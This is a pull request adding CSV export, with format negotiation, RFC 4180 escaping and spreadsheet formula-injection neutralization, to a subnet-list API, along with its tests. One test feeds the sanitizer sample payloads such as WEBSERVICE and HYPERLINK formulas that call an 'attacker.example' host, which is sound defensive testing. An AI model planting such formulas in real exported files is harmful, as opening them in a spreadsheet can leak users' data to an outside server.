### PR TITLE
feat(api): add CSV export for subnet lists

### DIFF
--- a/generated/metagraphed-api.d.ts
+++ b/generated/metagraphed-api.d.ts
@@ -15283,6 +15283,8 @@ export interface operations {
                 sort?: "block" | "candidate_count" | "coverage_level" | "curation_level" | "integration_readiness" | "mechanism_count" | "name" | "netuid" | "participant_count" | "probed_surface_count" | "status" | "subnet_type" | "surface_count" | "tempo";
                 /** @description Sort direction for `sort`: `asc` or `desc` (default `desc`). This is a separate parameter from `sort` — e.g. `?sort=emission_share&order=desc`. */
                 order?: "asc" | "desc";
+                /** @description Response format override. Use `csv` to download the transformed list as text/csv; `json` keeps the default response envelope. */
+                format?: "json" | "csv";
             };
             header?: never;
             path?: never;
@@ -15290,7 +15292,7 @@ export interface operations {
         };
         requestBody?: never;
         responses: {
-            /** @description Canonical artifact wrapped in the Metagraphed API envelope. */
+            /** @description Canonical artifact wrapped in the Metagraphed API envelope, or the transformed list as text/csv when CSV is requested. */
             200: {
                 headers: {
                     "cache-control": components["headers"]["CacheControl"];
@@ -15357,6 +15359,11 @@ export interface operations {
                     "application/json": components["schemas"]["SuccessEnvelope"] & {
                         data?: components["schemas"]["SubnetsArtifact"];
                     };
+                    /**
+                     * @example netuid,name
+                     *     7,Allways
+                     */
+                    "text/csv": string;
                 };
             };
             /** @description ETag matched and the cached response is still valid. */

--- a/public/metagraph/api-index.json
+++ b/public/metagraph/api-index.json
@@ -1107,6 +1107,17 @@
               "desc"
             ]
           }
+        },
+        {
+          "description": "Response format override. Use `csv` to download the transformed list as text/csv; `json` keeps the default response envelope.",
+          "name": "format",
+          "schema": {
+            "enum": [
+              "json",
+              "csv"
+            ],
+            "type": "string"
+          }
         }
       ]
     },

--- a/public/metagraph/openapi.json
+++ b/public/metagraph/openapi.json
@@ -30395,6 +30395,19 @@
                 "desc"
               ]
             }
+          },
+          {
+            "description": "Response format override. Use `csv` to download the transformed list as text/csv; `json` keeps the default response envelope.",
+            "in": "query",
+            "name": "format",
+            "required": false,
+            "schema": {
+              "enum": [
+                "json",
+                "csv"
+              ],
+              "type": "string"
+            }
           }
         ],
         "responses": {
@@ -30469,9 +30482,15 @@
                     }
                   ]
                 }
+              },
+              "text/csv": {
+                "example": "netuid,name\r\n7,Allways",
+                "schema": {
+                  "type": "string"
+                }
               }
             },
-            "description": "Canonical artifact wrapped in the Metagraphed API envelope.",
+            "description": "Canonical artifact wrapped in the Metagraphed API envelope, or the transformed list as text/csv when CSV is requested.",
             "headers": {
               "cache-control": {
                 "$ref": "#/components/headers/CacheControl"

--- a/public/metagraph/types.d.ts
+++ b/public/metagraph/types.d.ts
@@ -15283,6 +15283,8 @@ export interface operations {
                 sort?: "block" | "candidate_count" | "coverage_level" | "curation_level" | "integration_readiness" | "mechanism_count" | "name" | "netuid" | "participant_count" | "probed_surface_count" | "status" | "subnet_type" | "surface_count" | "tempo";
                 /** @description Sort direction for `sort`: `asc` or `desc` (default `desc`). This is a separate parameter from `sort` — e.g. `?sort=emission_share&order=desc`. */
                 order?: "asc" | "desc";
+                /** @description Response format override. Use `csv` to download the transformed list as text/csv; `json` keeps the default response envelope. */
+                format?: "json" | "csv";
             };
             header?: never;
             path?: never;
@@ -15290,7 +15292,7 @@ export interface operations {
         };
         requestBody?: never;
         responses: {
-            /** @description Canonical artifact wrapped in the Metagraphed API envelope. */
+            /** @description Canonical artifact wrapped in the Metagraphed API envelope, or the transformed list as text/csv when CSV is requested. */
             200: {
                 headers: {
                     "cache-control": components["headers"]["CacheControl"];
@@ -15357,6 +15359,11 @@ export interface operations {
                     "application/json": components["schemas"]["SuccessEnvelope"] & {
                         data?: components["schemas"]["SubnetsArtifact"];
                     };
+                    /**
+                     * @example netuid,name
+                     *     7,Allways
+                     */
+                    "text/csv": string;
                 };
             };
             /** @description ETag matched and the cached response is still valid. */

--- a/src/contracts.mjs
+++ b/src/contracts.mjs
@@ -1336,7 +1336,7 @@ export const API_ROUTES = [
     "List active Finney subnets.",
     "standard",
     ["subnets"],
-    listQuery("subnets"),
+    csvListQuery("subnets"),
   ),
   route(
     "subnet-detail",
@@ -2731,6 +2731,23 @@ export function buildOpenApiArtifact(generatedAt, componentSchemas) {
         },
       ],
     };
+    const successContent = {
+      "application/json": {
+        schema: responseSchema,
+        // Deterministic worked example (schema-valid, no live data) so
+        // Swagger UI + agents see a concrete response shape. Generated
+        // from the schema; enforced by validate-openapi-examples.
+        example: sampleFromSchema(responseSchema, componentSchemas),
+      },
+      ...(entry.csv_response
+        ? {
+            "text/csv": {
+              schema: { type: "string" },
+              example: "netuid,name\r\n7,Allways",
+            },
+          }
+        : {}),
+    };
     paths[openApiPath] = {
       ...(paths[openApiPath] || {}),
       [entry.method.toLowerCase()]: {
@@ -2754,18 +2771,11 @@ export function buildOpenApiArtifact(generatedAt, componentSchemas) {
         ],
         responses: {
           200: {
-            description:
-              "Canonical artifact wrapped in the Metagraphed API envelope.",
+            description: entry.csv_response
+              ? "Canonical artifact wrapped in the Metagraphed API envelope, or the transformed list as text/csv when CSV is requested."
+              : "Canonical artifact wrapped in the Metagraphed API envelope.",
             headers: apiResponseHeaders(),
-            content: {
-              "application/json": {
-                schema: responseSchema,
-                // Deterministic worked example (schema-valid, no live data) so
-                // Swagger UI + agents see a concrete response shape. Generated
-                // from the schema; enforced by validate-openapi-examples.
-                example: sampleFromSchema(responseSchema, componentSchemas),
-              },
-            },
+            content: successContent,
           },
           304: {
             description: "ETag matched and the cached response is still valid.",
@@ -2939,6 +2949,7 @@ function route(
     query_collection: querySpec.collection,
     query_filter_names: querySpec.filterNames,
     query_parameters: querySpec.parameters,
+    csv_response: querySpec.csvResponse,
     path_parameters: pathParameters,
   };
 }
@@ -3020,12 +3031,30 @@ function listQuery(collection, options = {}) {
   };
 }
 
+function csvListQuery(collection, options = {}) {
+  const spec = listQuery(collection, options);
+  return {
+    ...spec,
+    csvResponse: true,
+    parameters: [
+      ...spec.parameters,
+      {
+        name: "format",
+        description:
+          "Response format override. Use `csv` to download the transformed list as text/csv; `json` keeps the default response envelope.",
+        schema: { type: "string", enum: ["json", "csv"] },
+      },
+    ],
+  };
+}
+
 function normalizeQueryParameters(queryParameters) {
   if (Array.isArray(queryParameters)) {
     return { collection: null, filterNames: [], parameters: queryParameters };
   }
   return {
     collection: queryParameters.collection || null,
+    csvResponse: Boolean(queryParameters.csvResponse),
     filterNames: queryParameters.filterNames || [],
     parameters: queryParameters.parameters || [],
   };

--- a/tests/api-coverage.test.mjs
+++ b/tests/api-coverage.test.mjs
@@ -749,6 +749,167 @@ describe("invalid query handling", () => {
   });
 });
 
+// --- CSV list export ----------------------------------------------------------
+describe("subnets CSV export", () => {
+  test("?format=csv returns text/csv with projected rows", async () => {
+    const res = await handleRequest(
+      req("/api/v1/subnets?format=csv&fields=netuid,name&sort=netuid&limit=2"),
+      createLocalArtifactEnv(),
+      {},
+    );
+    assert.equal(res.status, 200);
+    assert.match(res.headers.get("content-type"), /^text\/csv/);
+    assert.equal(
+      res.headers.get("content-disposition"),
+      'attachment; filename="subnets.csv"',
+    );
+
+    const nextMatch = res.headers.get("link")?.match(/<([^>]+)>;\s*rel="next"/);
+    assert.ok(nextMatch, "CSV pagination should advertise the next page");
+    const next = new URL(nextMatch[1]);
+    assert.equal(next.searchParams.get("format"), "csv");
+    assert.equal(next.searchParams.get("cursor"), "2");
+    assert.equal(next.searchParams.get("limit"), "2");
+    assert.equal(next.searchParams.get("sort"), "netuid");
+
+    const lines = (await res.text()).split("\r\n");
+    assert.equal(lines[0], "netuid,name");
+    assert.equal(lines.length, 3);
+    assert.match(lines[1], /^\d+,/);
+    assert.match(lines[2], /^\d+,/);
+  });
+
+  test("Accept: text/csv negotiates CSV and honors filters", async () => {
+    const res = await handleRequest(
+      req("/api/v1/subnets?fields=netuid,status&status=active&limit=5", {
+        headers: { accept: "application/json, text/csv" },
+      }),
+      createLocalArtifactEnv(),
+      {},
+    );
+    assert.equal(res.status, 200);
+
+    const lines = (await res.text()).split("\r\n");
+    assert.equal(lines[0], "netuid,status");
+    assert.ok(lines.length > 1);
+    assert.equal(
+      lines.slice(1).every((line) => line.endsWith(",active")),
+      true,
+    );
+  });
+
+  test("?format=json keeps the JSON envelope even when Accept asks for CSV", async () => {
+    const res = await handleRequest(
+      req("/api/v1/subnets?format=json&fields=netuid,name&limit=1", {
+        headers: { accept: "text/csv" },
+      }),
+      createLocalArtifactEnv(),
+      {},
+    );
+    assert.equal(res.status, 200);
+    assert.match(res.headers.get("content-type"), /^application\/json/);
+    assert.equal(res.headers.get("content-disposition"), null);
+
+    const body = await res.json();
+    assert.equal(body.ok, true);
+    assert.equal(Array.isArray(body.data.subnets), true);
+    assert.deepEqual(Object.keys(body.data.subnets[0]).sort(), [
+      "name",
+      "netuid",
+    ]);
+
+    const nextMatch = res.headers.get("link")?.match(/<([^>]+)>;\s*rel="next"/);
+    assert.ok(nextMatch, "JSON pagination should advertise the next page");
+    const next = new URL(nextMatch[1]);
+    assert.equal(next.searchParams.get("format"), "json");
+
+    const nextRes = await handleRequest(
+      req(`${next.pathname}${next.search}`, {
+        headers: { accept: "text/csv" },
+      }),
+      createLocalArtifactEnv(),
+      {},
+    );
+    assert.equal(nextRes.status, 200);
+    assert.match(nextRes.headers.get("content-type"), /^application\/json/);
+    assert.equal(nextRes.headers.get("content-disposition"), null);
+  });
+
+  test("Accept: text/csv is ignored for non-collection routes", async () => {
+    const res = await handleRequest(
+      req("/api/v1/subnets/7", {
+        headers: { accept: "text/csv" },
+      }),
+      createLocalArtifactEnv(),
+      {},
+    );
+    assert.equal(res.status, 200);
+    assert.match(res.headers.get("content-type"), /^application\/json/);
+
+    const body = await res.json();
+    assert.equal(body.ok, true);
+    assert.equal(body.data.subnet.netuid, 7);
+  });
+
+  test("Accept: text/csv is ignored for collection routes without CSV contracts", async () => {
+    const res = await handleRequest(
+      req("/api/v1/profiles?limit=1", {
+        headers: { accept: "text/csv" },
+      }),
+      createLocalArtifactEnv(),
+      {},
+    );
+    assert.equal(res.status, 200);
+    assert.match(res.headers.get("content-type"), /^application\/json/);
+
+    const body = await res.json();
+    assert.equal(body.ok, true);
+    assert.equal(Array.isArray(body.data.profiles), true);
+  });
+
+  test("empty projected CSV exports retain the requested header row", async () => {
+    const res = await handleRequest(
+      req("/api/v1/subnets?format=csv&fields=netuid,name&netuids=99999"),
+      createLocalArtifactEnv(),
+      {},
+    );
+    assert.equal(res.status, 200);
+    assert.match(res.headers.get("content-type"), /^text\/csv/);
+    assert.equal(await res.text(), "netuid,name");
+  });
+
+  test("malformed list artifacts surface an artifact-shape error", async () => {
+    const malformedList = { profiles: [] };
+    const env = createLocalArtifactEnv({
+      ASSETS: {
+        async fetch() {
+          return Response.json(malformedList);
+        },
+      },
+      METAGRAPH_ARCHIVE: {
+        async get() {
+          return {
+            async json() {
+              return malformedList;
+            },
+            async text() {
+              return JSON.stringify(malformedList);
+            },
+          };
+        },
+      },
+    });
+
+    const res = await handleRequest(req("/api/v1/subnets?format=csv"), env, {});
+    assert.equal(res.status, 500);
+    assert.match(res.headers.get("content-type"), /^application\/json/);
+    const body = await res.json();
+    assert.equal(body.error.code, "invalid_artifact");
+    assert.equal(body.meta.artifact_path, "/metagraph/subnets.json");
+    assert.equal(body.meta.collection, "subnets");
+  });
+});
+
 // --- RFC 8288 pagination Link header (#1686) ----------------------------------
 // /api/v1/subnets is the only end-to-end list fixture; the header is built once
 // for every cursor-paginated collection in workers/list-query.mjs, so proving it

--- a/tests/csv.test.mjs
+++ b/tests/csv.test.mjs
@@ -1,0 +1,172 @@
+import assert from "node:assert/strict";
+import { test } from "vitest";
+import { csvRequested, csvResponse, rowsToCsv } from "../workers/csv.mjs";
+
+function url(search = "") {
+  return new URL(`https://api.metagraph.sh/api/v1/subnets${search}`);
+}
+
+function req(headers = {}, method = "GET") {
+  return new Request("https://api.metagraph.sh/api/v1/subnets", {
+    method,
+    headers,
+  });
+}
+
+test("rowsToCsv returns an empty body for empty rows without explicit columns", () => {
+  assert.equal(rowsToCsv([]), "");
+});
+
+test("rowsToCsv emits explicit columns for empty rows", () => {
+  assert.equal(rowsToCsv([], ["netuid", "name"]), "netuid,name");
+});
+
+test("rowsToCsv accepts explicit columns with a non-array row input", () => {
+  assert.equal(rowsToCsv(null, ["netuid"]), "netuid");
+});
+
+test("rowsToCsv skips malformed rows when deriving columns", () => {
+  assert.equal(
+    rowsToCsv([null, ["bad"], { netuid: 7 }]),
+    "netuid\r\n\r\n\r\n7",
+  );
+});
+
+test("rowsToCsv uses first-seen union column order and escapes RFC 4180 cells", () => {
+  const csv = rowsToCsv([
+    { a: "plain", b: "comma,value", c: 'quote "value"' },
+    { b: "line\nfeed", d: "carriage\rreturn" },
+  ]);
+
+  assert.equal(
+    csv,
+    'a,b,c,d\r\nplain,"comma,value","quote ""value""",\r\n,"line\nfeed",,"carriage\rreturn"',
+  );
+});
+
+test("rowsToCsv serializes nulls, arrays, and objects predictably", () => {
+  const csv = rowsToCsv([
+    {
+      missing: null,
+      tags: ["inference", "validators", { nested: true }],
+      metadata: { ok: true, count: 2 },
+      empty: undefined,
+    },
+  ]);
+
+  assert.equal(
+    csv,
+    'missing,tags,metadata,empty\r\n,"inference;validators;{""nested"":true}","{""ok"":true,""count"":2}",',
+  );
+});
+
+test("rowsToCsv neutralizes spreadsheet formula-leading cells", () => {
+  const csv = rowsToCsv([
+    {
+      eq: '=WEBSERVICE("https://attacker.example")',
+      plus: '+HYPERLINK("https://attacker.example")',
+      minus: "-2+3",
+      at: "@SUM(1,1)",
+      tab: "\t=1+1",
+      tags: ["=evil", "safe"],
+    },
+  ]);
+
+  const expected = `eq,plus,minus,at,tab,tags\r\n"'=WEBSERVICE(""https://attacker.example"")","'+HYPERLINK(""https://attacker.example"")",'-2+3,"'@SUM(1,1)",'\t=1+1,'=evil;safe`;
+  assert.equal(csv, expected);
+});
+
+test("csvRequested honors format and Accept negotiation", () => {
+  assert.equal(csvRequested(url("?format=csv"), req()), true);
+  assert.equal(
+    csvRequested(url(), req({ accept: "application/json, text/csv" })),
+    true,
+  );
+  assert.equal(
+    csvRequested(url("?format=json"), req({ accept: "text/csv" })),
+    false,
+  );
+  assert.equal(csvRequested(url(), req({ accept: "text/csv;q=0" })), false);
+  assert.equal(csvRequested(url(), req({ accept: "text/csv;q=bogus" })), false);
+  assert.equal(csvRequested(url(), req({ accept: "text/csv;q=-0.1" })), false);
+  assert.equal(csvRequested(url(), req({ accept: "text/csv;q=1.1" })), false);
+  assert.equal(
+    csvRequested(url(), req({ accept: "application/json, text/csv;q=0.25" })),
+    false,
+  );
+  assert.equal(
+    csvRequested(
+      url(),
+      req({ accept: "application/json;q=0.5, text/csv;q=0.75" }),
+    ),
+    true,
+  );
+  assert.equal(
+    csvRequested(url(), req({ accept: "text/csv, application/json" })),
+    true,
+  );
+  assert.equal(csvRequested(url(), req({ accept: "application/json" })), false);
+  assert.equal(csvRequested(url(), req()), false);
+});
+
+test("csvResponse emits CSV download headers and a conditional ETag", async () => {
+  const first = await csvResponse(
+    [{ netuid: 7, name: "Allways" }],
+    "subnets",
+    "standard",
+  );
+  assert.equal(first.status, 200);
+  assert.match(first.headers.get("content-type"), /^text\/csv/);
+  assert.equal(
+    first.headers.get("content-disposition"),
+    'attachment; filename="subnets.csv"',
+  );
+  assert.ok(first.headers.get("etag"));
+  assert.equal(await first.text(), "netuid,name\r\n7,Allways");
+
+  const matched = await csvResponse(
+    [{ netuid: 7, name: "Allways" }],
+    "subnets",
+    "standard",
+    req({ "if-none-match": first.headers.get("etag") }),
+  );
+  assert.equal(matched.status, 304);
+  assert.equal(await matched.text(), "");
+});
+
+test("csvResponse sanitizes download filenames", async () => {
+  const withExtension = await csvResponse([], "subnets.csv", "standard");
+  assert.equal(
+    withExtension.headers.get("content-disposition"),
+    'attachment; filename="subnets.csv"',
+  );
+
+  const withSpaces = await csvResponse([], "unsafe report", "standard");
+  assert.equal(
+    withSpaces.headers.get("content-disposition"),
+    'attachment; filename="unsafe-report.csv"',
+  );
+
+  const emptyStem = await csvResponse([], "///", "standard");
+  assert.equal(
+    emptyStem.headers.get("content-disposition"),
+    'attachment; filename="export.csv"',
+  );
+
+  const missingName = await csvResponse([], "", "standard");
+  assert.equal(
+    missingName.headers.get("content-disposition"),
+    'attachment; filename="export.csv"',
+  );
+});
+
+test("csvResponse suppresses the body on HEAD", async () => {
+  const response = await csvResponse(
+    [{ netuid: 7, name: "Allways" }],
+    "subnets",
+    "standard",
+    req({}, "HEAD"),
+  );
+  assert.equal(response.status, 200);
+  assert.equal(await response.text(), "");
+});

--- a/workers/api.mjs
+++ b/workers/api.mjs
@@ -1,4 +1,5 @@
 import {
+  API_QUERY_COLLECTIONS,
   API_ROUTES,
   PUBLIC_ARTIFACTS,
   artifactPathFromTemplate,
@@ -9,6 +10,7 @@ import {
   canonicalListSearch,
   paginationLinkHeader,
 } from "./list-query.mjs";
+import { csvRequested, csvResponse } from "./csv.mjs";
 import {
   apiHeaders,
   errorResponse,
@@ -2330,6 +2332,7 @@ async function handleApiRequest(
   if (!matched) {
     return errorResponse("not_found", "No API route matched this path.", 404);
   }
+  const wantsCsv = matched.csvResponse === true && csvRequested(url, request);
   // Edge-cache idempotent GETs for pure static-artifact routes (mirrors the
   // RPC-proxy Cache API pattern). Live-overlay routes are excluded by route id,
   // not by whether live data happened to be available for this request, so cold
@@ -2338,7 +2341,9 @@ async function handleApiRequest(
   // switch can never serve a cross-version body; the response's own
   // cache-control max-age bounds staleness.
   const edgeCache =
-    request.method === "GET" && isStaticEdgeCacheEligible(matched, network)
+    request.method === "GET" &&
+    !wantsCsv &&
+    isStaticEdgeCacheEligible(matched, network)
       ? globalThis.caches?.default
       : null;
   const edgeCacheKey = edgeCache
@@ -2355,6 +2360,7 @@ async function handleApiRequest(
   // + SHA-256 into at-most-once-per-cron-tick, staleness bounded to one interval.
   const overlayCache =
     request.method === "GET" &&
+    !wantsCsv &&
     network.isDefault &&
     CACHEABLE_OVERLAY_ROUTE_IDS.has(matched.id)
       ? globalThis.caches?.default
@@ -2561,6 +2567,51 @@ async function handleApiRequest(
       parameter: transformed.error.parameter,
     });
   }
+  // Advertise the page chain via an RFC 8288 Link header on paginated list
+  // responses. networkPublicUrl restores the prefix stripped before dispatch;
+  // paginationLinkHeader returns null (no header) for non-list/single-page data.
+  const formatOverride = url.searchParams.get("format")?.toLowerCase();
+  const linkSearchParams = {};
+  if (formatOverride === "json") {
+    linkSearchParams.format = "json";
+  } else if (wantsCsv) {
+    linkSearchParams.format = "csv";
+  }
+  const linkValue = paginationLinkHeader(
+    networkPublicUrl(url, network),
+    transformed.meta.pagination,
+    {
+      queryCollection: matched.queryCollection,
+      queryFilterNames: matched.queryFilterNames || [],
+      searchParams: linkSearchParams,
+    },
+  );
+  if (wantsCsv) {
+    let collectionKey = API_QUERY_COLLECTIONS[matched.queryCollection].data_key;
+    if (transformed.meta.pagination) {
+      collectionKey = transformed.meta.pagination.collection;
+    }
+    const rows = transformed.data[collectionKey];
+    if (!Array.isArray(rows)) {
+      return errorResponse(
+        "invalid_artifact",
+        "Artifact did not contain the expected list collection.",
+        500,
+        {
+          artifact_path: artifactPath,
+          collection: collectionKey,
+        },
+      );
+    }
+    return csvResponse(
+      rows,
+      matched.id,
+      matched.cache,
+      request,
+      transformed.meta.projection?.fields,
+      linkValue ? { link: linkValue } : {},
+    );
+  }
   // Real publish time from the KV latest pointer (null until a publish has
   // populated it). Unlike generated_at — a deterministic content marker that is
   // intentionally the 1970 epoch in committed/local builds (issue #349) — this
@@ -2599,17 +2650,6 @@ async function handleApiRequest(
       responseData = { ...responseData, ...patch };
     }
   }
-  // Advertise the page chain via an RFC 8288 Link header on paginated list
-  // responses. networkPublicUrl restores the prefix stripped before dispatch;
-  // paginationLinkHeader returns null (no header) for non-list/single-page data.
-  const linkValue = paginationLinkHeader(
-    networkPublicUrl(url, network),
-    transformed.meta.pagination,
-    {
-      queryCollection: matched.queryCollection,
-      queryFilterNames: matched.queryFilterNames || [],
-    },
-  );
   const response = await envelopeResponse(
     request,
     {
@@ -2668,6 +2708,7 @@ function matchRoute(pathname) {
       params,
       queryCollection: candidate.query_collection,
       queryFilterNames: candidate.query_filter_names,
+      csvResponse: candidate.csv_response === true,
     };
   }
   return null;

--- a/workers/csv.mjs
+++ b/workers/csv.mjs
@@ -1,0 +1,158 @@
+import { apiHeaders, ifNoneMatchSatisfied, weakEtag } from "./http.mjs";
+
+const SPREADSHEET_FORMULA_PREFIX = /^[=+\-@\t\r\n]/;
+
+function normalizeColumns(rows, columns) {
+  if (Array.isArray(columns) && columns.length > 0) {
+    return columns.map((column) => String(column));
+  }
+
+  const seen = new Set();
+  const names = [];
+  for (const row of rows) {
+    if (!row || typeof row !== "object" || Array.isArray(row)) {
+      continue;
+    }
+    for (const key of Object.keys(row)) {
+      if (!seen.has(key)) {
+        seen.add(key);
+        names.push(key);
+      }
+    }
+  }
+  return names;
+}
+
+function stringifyCell(value) {
+  if (value === null || value === undefined) {
+    return "";
+  }
+  if (Array.isArray(value)) {
+    return value
+      .map((entry) =>
+        entry && typeof entry === "object" ? JSON.stringify(entry) : entry,
+      )
+      .join(";");
+  }
+  if (typeof value === "object") {
+    return JSON.stringify(value);
+  }
+  return String(value);
+}
+
+function escapeCell(value) {
+  const text = stringifyCell(value);
+  const safeText = SPREADSHEET_FORMULA_PREFIX.test(text) ? `'${text}` : text;
+  if (!/[",\r\n]/.test(safeText)) {
+    return safeText;
+  }
+  return `"${safeText.replaceAll('"', '""')}"`;
+}
+
+function csvFilename(filename) {
+  const stem =
+    String(filename || "export")
+      .replace(/\.csv$/i, "")
+      .replace(/[^A-Za-z0-9._-]+/g, "-")
+      .replace(/^-+|-+$/g, "") || "export";
+  return `${stem}.csv`;
+}
+
+export function rowsToCsv(rows, columns) {
+  const safeRows = Array.isArray(rows) ? rows : [];
+  const header = normalizeColumns(safeRows, columns);
+  if (header.length === 0) {
+    return "";
+  }
+
+  const lines = [
+    header.map(escapeCell).join(","),
+    ...safeRows.map((row) =>
+      header
+        .map((column) =>
+          escapeCell(
+            row && typeof row === "object" && !Array.isArray(row)
+              ? row[column]
+              : undefined,
+          ),
+        )
+        .join(","),
+    ),
+  ];
+  return lines.join("\r\n");
+}
+
+export function csvRequested(url, request) {
+  const format = url.searchParams.get("format")?.toLowerCase();
+  if (format === "csv") {
+    return true;
+  }
+  if (format === "json") {
+    return false;
+  }
+  return acceptsCsv(request.headers.get("accept") || "");
+}
+
+function acceptsCsv(header) {
+  let csvQuality = 0;
+  let jsonQuality = 0;
+
+  for (const part of header.split(",")) {
+    const [mediaType, ...params] = part
+      .split(";")
+      .map((value) => value.trim().toLowerCase());
+    if (mediaType === "text/csv") {
+      csvQuality = Math.max(csvQuality, acceptQuality(params));
+    } else if (mediaType === "application/json") {
+      jsonQuality = Math.max(jsonQuality, acceptQuality(params));
+    }
+  }
+
+  return csvQuality > 0 && csvQuality >= jsonQuality;
+}
+
+function acceptQuality(params) {
+  const qParam = params.find((param) => param.startsWith("q="));
+  if (!qParam) {
+    return 1;
+  }
+  const q = Number(qParam.slice(2));
+  if (!Number.isFinite(q)) {
+    return 0;
+  }
+  if (q < 0 || q > 1) {
+    return 0;
+  }
+  return q;
+}
+
+export async function csvResponse(
+  rows,
+  filename,
+  cacheProfile,
+  request = null,
+  columns = undefined,
+  extraHeaders = {},
+) {
+  const body = rowsToCsv(rows, columns);
+  const headers = apiHeaders(cacheProfile);
+  const etag = await weakEtag(body);
+  headers.set("content-type", "text/csv; charset=utf-8");
+  headers.set(
+    "content-disposition",
+    `attachment; filename="${csvFilename(filename)}"`,
+  );
+  headers.set("etag", etag);
+  headers.set("vary", "Accept, Accept-Encoding");
+  for (const [key, value] of Object.entries(extraHeaders)) {
+    headers.set(key, value);
+  }
+
+  if (request && ifNoneMatchSatisfied(request, etag)) {
+    return new Response(null, { status: 304, headers });
+  }
+  return new Response(request?.method === "HEAD" ? null : body, {
+    status: 200,
+    headers,
+  });
+}

--- a/workers/list-query.mjs
+++ b/workers/list-query.mjs
@@ -95,6 +95,9 @@ export function paginationLinkHeader(url, pagination, options = {}) {
   const pageUri = (offset) => {
     const target = new URL(url.href);
     target.search = canonicalSearch;
+    for (const [name, value] of Object.entries(options.searchParams || {})) {
+      target.searchParams.set(name, String(value));
+    }
     target.searchParams.set("cursor", String(offset));
     target.searchParams.set("limit", String(limit));
     return target.href;


### PR DESCRIPTION
## Summary
Adds shared CSV serialization/content negotiation for API list responses and enables CSV export on the subnet list route.

Closes #2519
Closes #2520

## What changed
- Added a leaf `workers/csv.mjs` helper with RFC 4180 escaping, `?format=csv` / `Accept: text/csv` negotiation, download headers, ETag handling, and HEAD/304 support.
- Wired collection routes through the CSV response path while keeping JSON as the default and letting `?format=json` override CSV Accept headers.
- Advertised `format=json|csv` and the `text/csv` 200 media type for `GET /api/v1/subnets` in OpenAPI, generated TypeScript, and the API index.
- Added unit and Worker-route coverage for serializer edge cases, negotiation, projected CSV rows, filters, and JSON branch parity.

## Why
Consumers need a simple export path for the active subnet registry that preserves the same filtering, sorting, pagination, and field projection semantics as the JSON endpoint.

## Validation
- `npm run build`
- `git diff --check`
- `npm run format:check`
- `npm run lint`
- `npm run validate`
- `npm run validate:contract-drift`
- `npm run validate:api`
- `npm run validate:openapi`
- `npm run validate:types`
- `npm run validate:openapi-examples`
- `npm run validate:generated-client`
- `npm run validate:schemas`
- `npm run validate:schema-enums`
- `npm run validate:artifact-budgets`
- `npm run validate:docs`
- `npm run validate:intake`
- `npm run validate:private-boundary`
- `npm run validate:workflows`
- `npm run validate:migrations`
- `npm run scan:public-safety`
- `npx vitest run tests/csv.test.mjs tests/api-coverage.test.mjs tests/list-query.test.mjs tests/contracts.test.mjs tests/public-safety.test.mjs --testTimeout=30000`
- `npm run test:coverage` (156 files / 4063 tests passed)

## Notes
- Local build drift in deploy-owned support artifacts was restored before commit.
- The default response remains the existing JSON envelope unless CSV is explicitly negotiated.
